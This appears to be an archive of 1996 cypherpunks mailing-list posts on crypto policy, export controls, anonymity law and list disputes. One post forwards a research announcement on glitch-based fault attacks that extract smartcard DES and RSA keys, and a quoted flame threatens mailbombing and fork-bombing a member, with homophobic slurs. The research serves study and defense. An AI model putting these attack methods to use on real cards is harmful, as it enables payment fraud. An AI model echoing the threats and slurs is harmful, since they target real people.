first, you have now doubled the responses.  I may have done so here in fact.
What you say would be true if a message could be put on the "back burner"
after half of the receipients received thier copy.  Then, the remaining half
could get the reply before the post.  I believe I may be suffering from
something similar to this now as my e-mail address is probably near the
bottom of the rolls, due to my subscription being less than a month old.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Wed, 20 Nov 1996 10:02:13 -0800 (PST)
To: tcmay@got.net>
Subject: Re: Cypherpunks State of Emergency
Message-ID: <199611201801.MAA19090@mail.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


(snip)
> I think it's apparent that the events of Friday, with the other shoe to
> drop on Monday (the H-P/Intel/Microsoft/etc. Final Capitulation), signal to
> us that we are in a State of Emergency.
> 
> The Presidents of this country are in the habit of declaring such States of
> Emergency, often essentially secretly (in that the sheeple know little of
> such things, and those who speak of NSDDs and PDDs and EOs are demonized by
> the media as "conspiracy nuts" and "militia members").
> 
> Maybe it's time for us to stop flaming about Vulis and his allies, and
> concentrate on the Real War.
(snip)

I have to agree.  One of the most impressive things I have seen as a 
modern "movement" (yes I realize cpunks are not an organized 
movement, relax) was the massive public relations job done by several 
core cpunks around the 1993 Clipper proposal.  People with largely 
divergent opinions found public ground in their opposition to 
Clipper.  Lets do that again.

One thing that will help is spreading the use of filtering.  Those 
interested in learning how to filter should be able to ask any of us 
and we should all respond ASAP.  The Noise is horrible in here, but I 
only hear it in my trash folder.

[BTW, Tim, thanks for being willing to withstand the crap you go 
through.  You, and others on this list, have consistantly challenged 
and changed my assumptions about society, law and privacy.  I dont 
always agree with you.  But I am glad you are here.]

Matt Miszewski

> "The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
> that the National Security Agency would try to twist their technology."
> [NYT, 1996-10-02]
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rod@wired.com (Roderick Simpson)
Date: Wed, 20 Nov 1996 12:06:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Anon
Message-ID: <v02140b03aeb905639c67@[204.62.132.248]>
MIME-Version: 1.0
Content-Type: text/plain


Who has made the strongest case _against_ anonymity on the Net that you
have ever heard? Someone intelligent and theoretical rather than trapped in
some child porn or commerce pov.

Thanks,
Rod



R o d e r i c k S i m p s o n                                rod@wired.com
A s s o c i a t e P r o d u c e r  T h e H o t W i r e d N e t w o r k
www.braintennis.com                            www.wiredsource.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 20 Nov 1996 12:53:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Rogue Governments Issuing Policy Tokens
In-Reply-To: <v03007800aeb7b8522b6a@[207.167.93.63]>
Message-ID: <v03007804aeb92046fd09@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:33 AM -0800 11/20/96, John Anonymous MacDonald wrote:
>"Timothy C. May" <tcmay@got.net> writes:
>
>> I mention Libya as an extreme example (the same example cited in the
>> Fiat-Shamir "is-a-person" example of rogue governments issuing passports).
>> The examples above are likely targets for policy card exports, though. The
>> issue is clear: the list of "fully-compliant" nations is short indeed, and
>> few nations are going to accept imports of U.S. technology in which the
>> U.S. government sets the policy on how and where the imports may be used.
>
>Most "dual-use" items are export-restricted to Lybia.  That means US
>businesses will have trouble selling any computers or even things like
>trucks to Lybia.  For crypto tokens not to be available there does not
>seem to be a huge deal, in comparison with everything else.

As I said in another message, and as others have commented, the specifics
of Libya are not the point. The point I was making--and I cited other
countries besides Libya--remains that any U.S. policy regarding sales to
other countries, with U.S. policies built in, must comprehend the reality
that these government will use policy tokens to their advantage, and that
many uses may not appeal to us.

The "rogue government" problem is discussed in crypto circles...one of my
main points is that the U.S. Administration has consistently failed to
address questions along these lines.

--Tim May



"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 20 Nov 1996 11:20:00 -0800 (PST)
To: aga <aga@dhp.com>
Subject: Re: Does John Gilmore ?
In-Reply-To: <Pine.LNX.3.95.961120062407.20078J-100000@dhp.com>
Message-ID: <Pine.BSF.3.91.961120130826.27866B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



Grubby! Back under your rock!

On Wed, 20 Nov 1996, aga wrote:

> Somebody censored the header in this article,
> and we put it back.  You know, that is the worst
> kind of censorship, when somebody attempts to avoid the issue.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 20 Nov 1996 10:30:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: COMPUTER THEFT, LOW-TECH STYLE
Message-ID: <v0300781baeb8fbd27f65@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


X-Sender: oldbear@tiac.net
Date: Wed, 20 Nov 1996 11:12:35 -0500
To: rah@shipwright.com
From: Somebody
Subject: forwarded without comment
Mime-Version: 1.0

COMPUTER THEFT, LOW-TECH STYLE

A thief broke into a Visa International data processing center
in California a couple of weeks ago and stole a personal computer
containing information on about 314,000 credit card accounts,
including Visa, MasterCard, American Express, Discover and Diners
Club, says a Visa spokesman.

Some issuers, including Citibank, began calling customers last
week and have issued new cards.  Others are keeping quiet about
the event and monitoring accounts for unusual activity.

Authorities speculate that the perpetrator was stolen for the
resale value of the hardware, rather than the information it
contained.

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Wed, 20 Nov 1996 10:22:46 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: Stewart Baker on new crypto rules
Message-ID: <Pine.SUN.3.95.961120132436.4571I-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


http://www.steptoe.com/oped.htm

argues that industry won't accept any system that threatens to cut off
backwards compatibility after 2 years, hence DES export liberalization
will have to extend beyond the proposed period.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Wed, 20 Nov 1996 13:30:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: US supporting dissidents? (was Re: Rogue Governments Issuing Policy Tokens)
In-Reply-To: <v03007800aeb7b8522b6a@[207.167.93.63]>
Message-ID: <32937876.77D5@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


David Wuertele wrote:
> 
> "Timothy C. May" <tcmay@got.net> writes:
> 
> > Time to dust off those "Big Brother Inside" stickers someone had 
> 
> I know that Intel has succeeded in forcing the "Linux Inside" logo and 
> stickers off the net on threats of trademark infringement suits.  I 
> have a feeling "Big Brother Inside" would make them even more upset.

So? What if they do get upset?

See http://www.x86.org/

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Wed, 20 Nov 1996 04:49:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: st
Message-ID: <199611201249.NAA20943@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



s





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Wed, 20 Nov 1996 11:36:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: FYI - Anderson & Kuhn's new "Improved DFA" paper
Message-ID: <199611201934.OAA11249@nsa.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain


My appologies if this has been posted already.


------- Forwarded Message
From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
To: ccc-list@newton.cam.ac.uk
Message-ID: <E0vOSwQ-0000uc-00@heaton.cl.cam.ac.uk>
Subject: Research Announcement
Sender: owner-ccc-list@newton.cam.ac.uk
Precedence: bulk

                   Improved Differential Fault Analysis

                      Ross J Anderson, Markus G Kuhn

In [1], Biham and Shamir announce an attack on DES based on 200 ciphertexts in
which one-bit errors have been induced by environmental stress. Here we show an
attack that requires less than ten ciphertexts. Furthermore, our attack is
practical in that it uses a fault model that has been implemented in attacks on
real smartcards.

In [2], Biham and Shamir show how their method can be extended to reverse
engineer algorithms whose structure is unknown. Our attack can also be extended
to such cases and is more efficient there too. In [3], Boneh, De Millo and
Lipton discuss how such techniques can be used to attack RSA. Again, their
attack is theoretical only, We show how to do it in practice.


Introduction

A recent research announcement by Biham and Shamir shows that if DES is
implemented in a tamper-resistant package, and this package has the property
that by applying ionising radiation (or some other environmental stress) we can
cause random one-bit errors in the round keys, then we can break DES. If we can
get a series of ciphertexts, each generated from the same plaintext but with a
different one-bit random round key error, then we will need about 200 faulty
ciphertexts to recover the key. In a further announcement [2], they show how on
a similar fault model, the structure of unknown Feistel ciphers can be deduced
from an adequate number of faulty ciphertexts. In each case, the critical
observation is that errors that occur in the last few round of the cipher leak
information about the key, or algorithm structure, respectively.

This work is inspired by a paper of Boneh, DeMillo and Lipton [3] who assume 
(as Biham and Shamir do) that one-bit errors can be caused by radiation or
other environmental stresses. That paper goes on to show that with this fault 
model, RSA can be attacked.

These results have been widely publicised in the press. A frequently voiced
criticism is that the attacks are purely theoretical: no-one has demonstrated
that single bit errors can actually be induced in a DES key schedule or an RSA
computation in any fielded device. In fact, most smartcards hold keys in EEPROM
which also contains much or all of the device's application software. Thus
errors induced by ionising radiation would be much more likely to corrupt
software, thus leading either to a system crash or to uninformative wrong
answers.

We show here that much faster, and completely practical, attacks are possible.
The trick is to induce small changes in the code rather than trying to cause
them in keys or other data.


The Improved Attack Methodology

In a note posted to relevant Internet newsgroups on the 7th November, one of us
pointed out that using clock and power glitches gives a practical way of
implementing the Lenstra variant of the Boneh attack. In this announcement, we
will expand on the threat model, and also show how attacks using clock and
power glitches can give attacks on DES that require many fewer ciphertexts -
less than ten rather than the 200 or so previously required.

In a paper on tamper resistance due to be published next week, we describe a
number of techniques for attacking smartcards and other security processors
[5]. This paper was written some time ago (the first results were presented at
the Isaac Newton Institute, Cambridge, in June) but has been withheld by
agreement with the manufacturer of one of the security processors we have
attacked, so that banking industry clients had some time to take suitable
precautions. Some of the attacks we describe in this paper are new, while
others are already known in various small communities (such as hackers and chip
testers) and are included for the benefit of the wider crypto and security
communities.

One of the latter type is that smartcards and other security processors can
often be attacked using clock and power glitches. The application of a clock
pulse that is much faster than normal, or of a transient in the power supply,
can often cause faulty behaviour in a microprocessor, under which the program
counter is incremented but the current instruction is executed either
incorrectly or not at all. A standard version of this attack is to replace a
single 5MHz clock pulse to a smartcard with four 20MHz pulses.

We do not claim to have invented this attack; it appears to have originated in
the pay-TV hacking community, which has known about it for at least a year. In
that context, it has not been used for attacks on cryptographic algorithms, but
in order to cause output loops to run for longer than the card's programmer
intended, thus dumping key material to the output port.

The glitch attack is described more fully in our tampering article, which will
appear at next week's Usenix Electronic Commerce Workshop [5].

In this note, we point out that attacks based on faulty instructions are not
only proven practical, unlike the as yet undemonstrated fault model of random
single bit errors induced by radiation. They also provide a much more powerful
attack on many cryptographic algorithms. This holds both when we are seeking to
recover a key for a known algorithm such as DES, and when we are trying to
reverse engineer an unknown algorithm that has been provided in a smartcard or 
other tamper resistant processor.


Attacking RSA

A simplified version of the Boneh-DeMillo-Lipton attack, due to Lenstra, is
quoted in [3]: if a smart card computes an RSA signature S on a message M
modulo n = pq by computing it modulo p and q separately and then combining them
using the Chinese Remainder Theorem, and if an error an be induced in (say) the
latter computation, then we can factor n at once as p = gcd(n,S^e-M) where e is
the public exponent.

This is absolutely ideal for a glitch attack. As the card spends most of its
time calculating the signature mod p and mod q, and almost any glitch that
affects the output will do, we do not have to be at all selective about where
in the instruction sequence the glitch is applied. Since only a single
signature is needed, the attack can be performed online: a Mafia eftpos
terminal applies the glitch, factors the modulus, calculates what the correct
signature should be, and sends this on to the bank. 

Thus the Mafia can harvest RSA secret keys without the customer or his bank
noticing anything untoward about the transaction he did at their shop. Given
that implementers of the new EMV electronic purse system propose to have only
10,000 different RSA secret keys per issuing bank, the Mafia will soon be able
to forge cards for a substantial proportion of the user population.


Attacking DES

When we can cause an instruction of our choice to fail, then attacking DES is
simple. We remove one of the xor operations that are used to combine the round
keys with the inputs to the S-boxes from the last two rounds of the cipher, and
repeat this for each of these key bytes in turn. The erroneous ciphertext
outputs that we receive as a result of this attack will each differ from the
genuine ciphertext in the output of usually two, and sometimes three, S-boxes.
Using the techniques of differential cryptanalysis, we obtain about five bits
of information about the eight keybits that were not xor'ed as a result of the
induced fault. So, for example, eight faulty ciphertexts should give us about
40 bits of the key, leaving a trivial keysearch.

Thus DES can be attacked with about one correct and eight faulty ciphertexts.
But how realistic is it to assume that we will be able to target particular
instructions?

In most smartcards, the manufacturer supplies a number of routines in ROM.
Though sometimes presented as an `operating system', the ROM code is more of a
library or toolkit that enables application developers to manage communications
and other facilities. Its routines usually include the DES algorithm (or a
proprietary algorithm such as Telepass), and by buying the manufacturer's
smartcard development toolkit (for typically a few thousand dollars) an
attacker can get full documentation plus real specimens for testing. In this
case, individual DES instructions can be targeted.

When confronted with an unfamiliar implementation, we may have to experiment
somewhat (we have to do this anyway with each card in order to find the correct
glitch parameters [5]). However the search space is relatively small, and on
looking at a few DES implementations it becomes clear that we can usually
recognise the effects of removing a single instruction from either of the last
two rounds. (In fact, many of these instructions yield almost as much
information when removed from the implementation as the key xor instructions
do.) We will discuss this at greater length in a later paper.


The ROM Overwrite Attack

Where the implementation is familiar, there is yet another way to extract keys
from the card - the ROM overwrite attack.

Single bits in a ROM can be overwritten using a laser cutter, and where the DES
implementation is well known, we can find one bit (or a small number of bits)
with the property that changing it will enable the key to be extracted easily.
The details will depend on the implementation but we might well be able, for
example, to make a jump instruction unconditional and thus reduce the number of
rounds in the cipher to one or two. Where the algorithm is kept in EEPROM, we
can use two microprobing needles to set or reset the target bit [6].

Where we have incomplete information on the implementation, ROM overwriting
attacks can be used in other ways. For example, if the DES S-boxes in ROM, we
can identify them using an optical microscope and use our laser cutter to make
all their bits equal. This turns DES into a linear transfromation over GF(2),
and we can extract the key from a single plaintext/ciphertext pair.

Although ROM overwrite (unlike the other attacks suggested in this paper)
involves access to the chip surface, it can be carried out using tools that are
relatively cheap and widely available. So it may be used by attackers who do
not have access to the expensive semiconductor test equipment that professional
pirates use to extract keys directly from smartcards [5].

Returning to the non-invasive attack model, we can always apply clock and power
glitches until simple statistical tests suddenly show a high dependency between
the input and output of the encryption function, indicating that we have
succeeded in reducing the number of rounds. This may be practical even where
the implementation details are unknown.


Reverse Engineering an Unknown Block Cipher

In [2], Biham and Shamir discuss how to identify the structure of an unknown
block cipher in a tamper resistant package (e.g., Skipjack) using one-bit
random errors. As before, they identify faults that affected only the last
round or rounds; this can be done by looking for ciphertexts at a low Hamming
distance from each other. They then identify which output bits correspond to
the left and right halves, and next look at which bits in the left half are
affected by one bit changes in the last-but-one right half. In the case of a
cipher such as DES with S boxes, the structure will quickly become clear and
with enough ciphertexts the values of the S-boxes can be reconstructed. They
report that with 500 ciphertexts the gross structure can be recovered, and with
about 10,000 the S-box entries themselves can be found.

Our technique of causing faults in instructions rather than in data bits is
more effective here too. We can attack the last instruction, then the second
last instruction, and so on.

We will give detailed estimates for DES in the final paper. Let us now consider
an actual classified algorithm. `Red Pike' was designed by GCHQ for encrypting
UK government traffic classified up to `Restricted', and the Department of
Health wishes to use it to encrypt medical records. The British Medical
Association, advised by one of us (Anderson) instead recommended that an
algorithm be chosen that had been in the open literature for at least two years
and had withstood attempts to find shortcuts (triple-DES, Blowfish, SAFER
K-128, WAKE,...).

In order to try and persuade the BMA that Red Pike was sound, the government
commissioned a study of it by four academics [7]. This study states that Red
Pike `uses the same basic operations as RC5' (p 4) in that the principal
operations are add, exclusive or, and left shift. It `has no look-up tables,
virtually no key schedule and requires only five lines of code' (p 4). Other
hints include that `the influence of each key bit quickly cascades' (p 10) and
`each encryption involves of the order of 100 operations' (p 19).

We can thus estimate the effort of reverse engineering Red Pike from a tamper 
resistant hardware implementation by considering the effort needed to mount a 
similar attack on RC5.

Removing the last operation - the addition of key material - yields an output
in which the right hand side is different (it is (B xor A) shl A). This
suggests, correctly, that the cipher is a balanced Feistel network without a
final permutation. Removing the next operation - the shift - makes clear that
it was a 32 bit circular shift but without revealing how it was parametrised.
Removing the next operation - the xor - is transparent, and the next - the
addition of key material in the previous round - yields an output with the
values A and B in the above expression. It thus makes the full structure of
the data-dependent rotation clear. The attacker can now guess that the
algorithm is defined by

          A = ((A xor B) shl B) op key
          B = ((B xor A) shl A) op key

Reverse engineering RC5's rather complex key schedule (and deducing that `op'
is actually +) would require single-stepping back through it separately; but
once we know that `op' is +, we can find the round key bits directly by working
back through the rounds of encryption.

So, apart from its key schedule, RC5 may be about the worst possible algorithm
choice for secret-algorithm hardware applications, where some implementations
may be vulnerable to glitch attacks. If Red Pike is similar but with a simpler
key schedule, then it could be more vulnerable still. However, since the
government plans to make Red Pike available eventually in software, this is not
a direct criticism of the design or choice of that algorithm.

It does all suggest, though, that secret-hardware algorithms should be more
complex; large S-boxes kept in EEPROM (that is separate from the program
memory) may be a sensible way of pushing up the cost of an attack. Other
protective measures that prudent designers would consider include error
detection, multiple encryption with voting, and designing the key schedule so
that the key material from a small number of rounds is not enough for a break.


Conclusion

We have improved on the Differential Fault Analysis of Biham and Shamir. Rather
than needing about 200 faulty ciphertexts to recover a DES key, we need less
than ten. We can factor RSA moduli with a single faulty ciphertext. We can also
reverse engineer completely unknown algorithms; this appears to be faster than
Biham and Shamir's approach in the case of DES, and is particularly easy with
algorithms that have a compact software implementation such as RC5.

Finally, our attacks - unlike those of Biham, Shamir, Boneh, DeMillo and Lipton
- - use a realistic fault model, which has actually been implemented and can be
used against fielded systems.


Acknowledgement

Mike Roe pointed out that the glitch attack on RSA can be done in real time by
a Mafia owned eftpos terminal.


Bibliography

[1] ``A New Cryptanalytic Attack on DES'', E Biham, A Shamir, preprint, 
18/10/96

[2] ``Differential Fault Analysis: Identifying the Structure of Unknown Ciphers
Sealed in Tamper-Proof Devices'', E Biham, A Shamir, preprint, 10/11/96

[3] ``On the Importance of Checking Computations'' D Boneh, RA DeMillo, RJ 
Lipton, preprint

[4] ``A practical variant of the Bellcore attack'', RJ Anderson, posted to
sci.crypt as message ID <55picf$dm3@lyra.csx.cam.ac.uk>, 7/11/96

[5] ``Tamper Resistance - A Cautionary Note'', RJ Anderson, MG Kuhn, to appear
in Usenix Electronic Commerce workshop, 19/11/96

[6] ``Hardwaresicherheit von Mikrochips in Chipkarten'', Osman Kocar,
Datenschutz und Datensicherheit v 20 no 7 (July 96) pp 421--424

[7] ``Red Pike --- An Assessment'', C Mitchell, S Murphy, F Piper, P Wild,
Codes and Ciphers Ltd 2/10/96

------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 20 Nov 1996 13:02:51 -0800 (PST)
To: dave@cave.gctech.co.jp (David Wuertele)
Subject: Re: US supporting dissidents? (was Re: Rogue Governments Issuing Policy Tokens)
In-Reply-To: <ygelobxjbm7.fsf@cave.gctech.co.jp>
Message-ID: <199611202119.PAA04919@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> "Timothy C. May" <tcmay@got.net> writes:
>> Time to dust off those "Big Brother Inside" stickers someone had printed up
>> a couple of years ago.
>I know that Intel has succeeded in forcing the "Linux Inside" logo and stickers
>off the net on threats of trademark infringement suits.  I have a feeling "Big
>Brother Inside" would make them even more upset.

     Question:

     If one were to start a "big brother inside" campaign against Intel as a 
form of _political_ protest against their (and the goverments) actions and 
policies, would it be considered trademark infringement, or could it be 
"protected speech" under the first amendment? 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Thu, 21 Nov 1996 09:43:31 -0800 (PST)
To: aga <aga@dhp.com>
Subject: Re: The Limey PUNK needs TERMINATED
Message-ID: <848597693.516260.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> what are you, fat?

Maybe I am, maybe I`m not, at least I can honestly say I`m not a 
homophobic fuckup.

> you are now scheduled for termination as a result
> of this e-mail.  this is your last warning.

Termination? - give me a break you pre-pubescent "k00l HaKk1nG D0od"


> Hey you limey PUNK, you can not do SHIT!  If you get out of hand here,
> I will mailbomb you into SMITHERINES!  And kill your whole fucking
> site with fork-bombs if necessary.

Go ahead punk, make my day. As they say, your ass is grass and I`m 
the lawnmower. Your postmaster will be forwarded copies of any more 
abusive mail you send me and if, as I suspect, you are about 13 years 
old, I will tell your parents, now go on, shoo.


> Paul Bradley seemsw to be just another faggot suppporting the
> main Faggot, John Gilmore.

Learn how to spell and type. Once you have done that become educated 
as to why someones sexual orientation is their own business and 
nobody elses. Then in about 20 years return when you have something 
worthwhile to add to the discussion.

> A "punk" means you are a WIMP!

Oh no, I`m so depressed now. To think that being a cryptographer 
could mean that I couldn`t kick your scrawny ass. I have no interest 
in your aspersions being cast at my physical prowess. I believe I, 
along with the other members of the list have progressed beyond the 
neanderthal level of insulting and physically pounding people into 
submission. However, you are making me think about returning to this 
practice.
 
> I think it is about time for the Freedom Knights to
> just kick the fucking shit out of the cypherpunks list!

Yes, sure Mr. Grubor.
 
> This is your last warning, punk.

Oh no, was it, looks like I`m being mailbombed then.
 
> If you get out of line again, both you and your list
> will be terminated.

Yes, I knew it. Please, for the sake of all humanity get an education 
you pimply adolescent masturbator.

Good day to you. 


  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 20 Nov 1996 13:28:42 -0800 (PST)
To: aga@dhp.com (aga)
Subject: Re: The Limey PUNK needs TERMINATED
In-Reply-To: <Pine.LNX.3.95.961120054330.20078D-100000@dhp.com>
Message-ID: <199611202145.PAA04969@smoke.suba.com>
MIME-Version: 1.0
Content-Type: application/x-pgp-message

application/pgp-message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 20 Nov 1996 13:14:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: Why I Don't Read SF Much Anymore
Message-ID: <3.0b36.32.19961120161314.0076ad68@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm off straight science fiction these days because the real world is so
science fictional that I find it hard to suspend disbelief.  I do continue
to like military SF though and now straight military fiction.  

The problem with straight SF for me is that computers and networks have
changed the future so much that (in the words of the motto of the SF
Writer's Association) The Future Ain't What It Used to Be.  The science
fictional futures of my childhood are now dead as doornails.  And I can't
enjoy contemporary SF that doesn't include a healthy dose of computers and
networking.  

Unfortunately,  Since I am involved in "defining" the future in the debates
over the effects of the technology, I also can't suspend disbelief and like
stories that come to radically different conclusions about that future than
I have.  This is not old fuddy duddyism (I hope) but arises because the
nature of society these days is such that the future has become much more
of a consensual act on all our parts and I consider it important to hold
fast to my vision of the future and push it so that it comes about.  This
doesn't encourage suspensions of disbelief.  Meanwhile there are plenty of
other things to read.  Not that I get to read that much fiction these days.
 The Nets take too much time.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 20 Nov 1996 13:23:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Rogue Governments Issuing Policy Tokens
Message-ID: <3.0b36.32.19961120162330.0070a4c4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:33 AM 11/20/96 -0800, John Anonymous MacDonald wrote:
>Most "dual-use" items are export-restricted to Lybia.  That means US
>businesses will have trouble selling any computers or even things like
>trucks to Lybia.  For crypto tokens not to be available there does not
>seem to be a huge deal, in comparison with everything else.

Particularly since Libya bought a bunch of "oil drilling rig transport
trucks" from Oshkosh Truck Corp in the '70s and hired a bunch of Brits to
convert them into tank transporters.  Didn't help them against the deadly
Toyota pickups of the Chadian Defense Forces though.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Wed, 20 Nov 1996 17:05:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: CServe Does The Right Thing
Message-ID: <199611210051.QAA28762@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



COMPUSERVE MAY PULL ADMIN UNIT OUT OF GERMANY
CompuServe's administrative operations in Germany may be
transferred to another country because of proposed German
legislation that would make Internet companies block access to
pornography, neo-Nazi material or extremist pictures or writing.
CompuServe says it does not want to be in the position of having to
"censor" the Internet.  (New York Times 19 Nov 96 C5)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com (Alec)
Date: Wed, 20 Nov 1996 13:52:02 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: ACLU sues GA over net ban
Message-ID: <3.0.32.19961120165211.0069733c@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/enriched

>X-Sender: ewatkins@pop.ipst.edu
>Date:         Wed, 20 Nov 1996 16:01:30 -0500
>Reply-To: Electronic Frontiers Ga Action Mailing List <ACTION@efga.org>
>Sender: Electronic Frontiers Ga Action Mailing List <ACTION@efga.org>
>From: Eric James Watkins <eric.watkins@IPST.EDU>
>Subject:      AJC [Atlanta Journal and Constitution] Front page Tuesday final edition
>To: ACTION@EFGA.ORG
>
---------------------------------------------------------
>We made the front page!!! I don't have
>permission to distribute this.  I consider it fair use, and I did suggest
>everyone buy a paper earlier.  Note:  The AJC does not archive these articles.
>----------------------------------------
>ACLU sues the state over its ban on some Internet communication
>
>By Art Kramer
>STAFF WRITER
>
>    The ACLU filed suit against the state Tuesday, alleging that a Georgia
>law barring the use of pseudonyms and anonymous communication on the
>Internet is unconstitutional.
>    In the first court challenge in an ongoing campaign against
>Internet-related laws in 13 states, the American Civil Liberties Union
>alleges that when Georgia passed the law affecting the Internet, it
>unconstitutionally encroached on the federal power to regulate interstate
>commerce.
>    The suit was filed in U.S. District Court in Atlanta on behalf of
>Electronic Frontiers Georgia (EFGA), Rep. Mitchell Kaye (R-Marietta), and 12
>other groups and individuals.
>    "The right to speak and publish using a virtual 'nom de plume' has its
>roots in a long tradition dating back to the very founding of democracy in
>this country," said Ann Beeson, staff attorney for the ACLU.
>    Beeson's use of the Constitution's "commerce clause," the first in an
>Internet-related case, could invalidate many state laws affecting the global
>computer network, said Trotter Hardy, a professor of law at William and Mary
>Law School in Williamsburg, Va.
>    But Hardy said that approach could backfire by strengthening the case
>for federal regulation of the Internet, a result civil libertarians may come
>to regret.
>    State Attorney General Michael Bowers said Tuesday he had not reviewed
>the case yet, but that his office typically pursues lawsuits against the
>state vigorously. He has 20 days to respond in court.
>    The ACLU is among a coalition that in February challenged the federal
>Communications Decency Act, which bars online content deemed indecent or
>"patently offensive." A Philadelphia federal court's decision in June to
>block enforcement of the law is on appeal to the Supreme Court.
>    China, Singapore, Australia, France, Britain and other countries are
>debating or enacting curbs on Internet content, and several U.S. states are
>considering or already have regulated online material.
>    The ACLU lawsuit also targets a portion of the Georgia law that  the
>group contends prohibits online use of trademarked material without
>permission. The law went into effect July 1.
>    That could threaten the use of protected materials such as corporate
>logos as links on the World Wide Web, a practice that is now routine, said
>EFGA executive director Robert Costner. On EFGA's page, for example,
>selecting the BellSouth logo takes the viewer to BellSouth's Web page.
>    But the law's author, Rep. Don Parsons (R-Marietta), called that
>argument preposterous.
>    "It's just common sense. A link is not an attempt to make a  visitor
>believe your Web page is someone else's, which is what the law is meant to
>prevent," Parsons said.
>    Kaye, whose use of the Georgia State Seal on his home page angered some
>legislators, said he joined the suit to promote open, accessible government.
>    Kaye said the law has "given Georgia a black eye, sending a message to
>the world that we do not understand and are inhospitable to technology."
>    Parsons said he's been unfairly characterized as an Internet know-nothing.
>    "I'm an advocate for the Internet's possibilities. To reach its full
>potential, users must have real confidence that the sites they visit are
>credible, that they are who they say they are. That's all the bill was
>supposed to do."
